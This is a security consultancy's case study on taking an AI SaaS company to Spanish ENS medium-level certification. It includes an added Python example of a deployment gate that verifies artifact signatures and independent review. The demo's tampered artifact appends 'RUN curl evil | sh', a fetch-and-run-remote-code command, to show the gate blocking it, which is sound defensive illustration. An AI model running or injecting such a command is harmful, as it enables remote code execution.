Hard2bit

Case study · SaaS · AI · Public sector

ENS medium level at an AI SaaS company

A Spanish SaaS company wanted to enter the public sector, and its first two tenders required conformity with the ENS — Spain's National Security Framework. Cloud-native platform, daily deployments and AI functionality inside the product. Six months later it was certified at medium level without slowing its release pace.

Sector

SaaS development · AI

Size

~40 employees

Framework

ENS · medium level

Infrastructure

Public cloud · containers

Duration

6 months to certification

Outcome

Certified · eligible to bid

The starting point

The team was technically mature — infrastructure as code, CI/CD with daily deployments, sound development practices — but the entire security governance lived in the CTO's head. No formal security policy, no risk analysis, no system categorisation. And one detail that complicated the certification dossier: the product included AI functionality processing customer information, something the certification body would examine closely.

The CTO's fear was the classic one tech companies have about the ENS: that bureaucracy would kill the team's velocity. The project was designed with that limit as a hard requirement — no control could break the continuous-deployment flow.

How we approached it

  1. Categorisation and profiling — analysis of the services to be provided to public administrations and of the information handled. The resulting category was medium, and we worked with the applicable compliance profile, avoiding oversized measures.
  2. Risk analysis and Statement of Applicability — a lightweight but traceable methodology aligned with how the company actually operates: cloud assets, the CI/CD pipeline, third-party dependencies, and the AI component treated as a distinct asset with risks of its own (training data, output traceability, model providers).
  3. Controls inside the pipeline, not on top of it — access control with MFA and quarterly reviews, signed and reviewed deployments, centralised logging with defined retention, encryption in transit and at rest, and vulnerability management wired into the development cycle. Evidence generates itself: the pipeline is the record.
  4. Documentation sized to the company — a documentation body that forty people can genuinely maintain: policy, usage rules, operating procedures and a continuity plan proven with a real recovery exercise.
  5. Certification audit — support throughout the audit with an accredited body, including defending the approach applied to the AI component. Certified at the first attempt.
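To make step 3 concrete, here is a worked illustration of a deployment gate that enforces two of the controls named above (signed artifacts and independent review) and writes its own evidence record on every decision, including blocks. It is an added example for this case study, not Hard2bit's or the client's code, and it makes assumptions the page does not state: artifacts are signed with an HMAC-SHA256 key held by the CI runner (a production pipeline would normally use asymmetric signatures, e.g. Sigstore/cosign), review metadata arrives as a dict from the source-control system, and evidence is appended as JSON lines to a file kept for the retention period the logging policy defines. The sample artifact, key and change record are constructed for the demo.

```python
"""Deployment gate whose output is the audit evidence.

Illustrative example added to this case study (not the original page's or
the client's code). Assumptions: HMAC-SHA256 artifact signatures with a key
held by the CI runner, review metadata supplied as a dict by the SCM, and
evidence appended as JSON lines to a retention-managed file.
"""
import hashlib
import hmac
import json
from datetime import datetime, timezone

# Constructed sample inputs: not real key material, not a real artifact.
SIGNING_KEY = b"ci-signing-key-constructed-for-demo"
ARTIFACT = b"FROM scratch\nCOPY app /app\nENTRYPOINT [\"/app\"]\n"
EVIDENCE_PATH = "deploy-evidence.jsonl"  # assumed path; retention set by policy


def artifact_digest(data: bytes) -> str:
    """SHA-256 of the built artifact; this is what gets signed and logged."""
    return hashlib.sha256(data).hexdigest()


def sign_artifact(data: bytes, key: bytes) -> str:
    """Build stage: sign the digest so the deploy stage can verify provenance."""
    return hmac.new(key, artifact_digest(data).encode(), hashlib.sha256).hexdigest()


def verify_signature(data: bytes, signature: str, key: bytes) -> bool:
    """Deploy stage: constant-time comparison against a freshly computed MAC."""
    return hmac.compare_digest(sign_artifact(data, key), signature)


def reviewed_by_someone_else(change: dict) -> bool:
    """Separation of duties: the author may not be the only approver."""
    approvers = set(change.get("approvers", []))
    approvers.discard(change.get("author"))
    return len(approvers) >= 1


def gate_deployment(data: bytes, signature: str, change: dict, key: bytes):
    """Run the controls and return (allowed, evidence_record).

    The record is produced for every decision, so a blocked deployment is
    evidence of enforcement, not a gap in the log.
    """
    checks = {
        "signature_valid": verify_signature(data, signature, key),
        "independent_review": reviewed_by_someone_else(change),
    }
    allowed = all(checks.values())
    record = {
        "ts": datetime.now(timezone.utc).isoformat(),
        "commit": change.get("commit"),
        "artifact_sha256": artifact_digest(data),
        "author": change.get("author"),
        "approvers": sorted(change.get("approvers", [])),
        "checks": checks,
        "decision": "deploy" if allowed else "block",
    }
    return allowed, record


def append_evidence(record: dict, path: str = EVIDENCE_PATH) -> None:
    """Append one JSON line; the pipeline's log is the control's record."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(record, sort_keys=True) + "\n")


if __name__ == "__main__":
    sig = sign_artifact(ARTIFACT, SIGNING_KEY)
    change = {"commit": "abc123", "author": "ana", "approvers": ["ana", "luis"]}

    for label, data, meta in (
        ("clean release", ARTIFACT, change),
        ("tampered artifact", ARTIFACT + b"\nRUN curl evil | sh\n", change),
        ("self-approved change", ARTIFACT, {**change, "approvers": ["ana"]}),
    ):
        ok, rec = gate_deployment(data, sig, meta, SIGNING_KEY)
        append_evidence(rec)
        print(f"{label}: {rec['decision']} {rec['checks']}")
```

In a real pipeline the gate runs as the last job before the deploy step, the evidence file is shipped to the central log store with the retention the policy defines, and the quarterly access review can be answered from the same records (who approved what, when) without anyone assembling a spreadsheet by hand.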

Results

6 months

from first meeting to ENS medium-level certification

2

public tenders submitted in the same quarter as certification

0

deployments blocked by the ISMS: release pace untouched

Certification opened the door the company was after — bidding for public contracts — and produced a side effect nobody expected: two large private clients accelerated their supplier-onboarding processes on seeing the ENS seal and the security documentation already prepared.

What made it work

  • The ENS and continuous deployment are not at odds: if the control lives inside the pipeline, the evidence produces itself.
  • Treating AI as an asset with its own risks from the initial analysis avoided objections at audit.
  • Categorising properly at the start (medium, not high out of misplaced caution) saved months and unnecessary measures.

Related services

Need the ENS to bid for public contracts?

Hard2bit is ENS-certified at high level — we know the framework from the inside. We help you categorise correctly, implement just enough and arrive at the audit with evidence.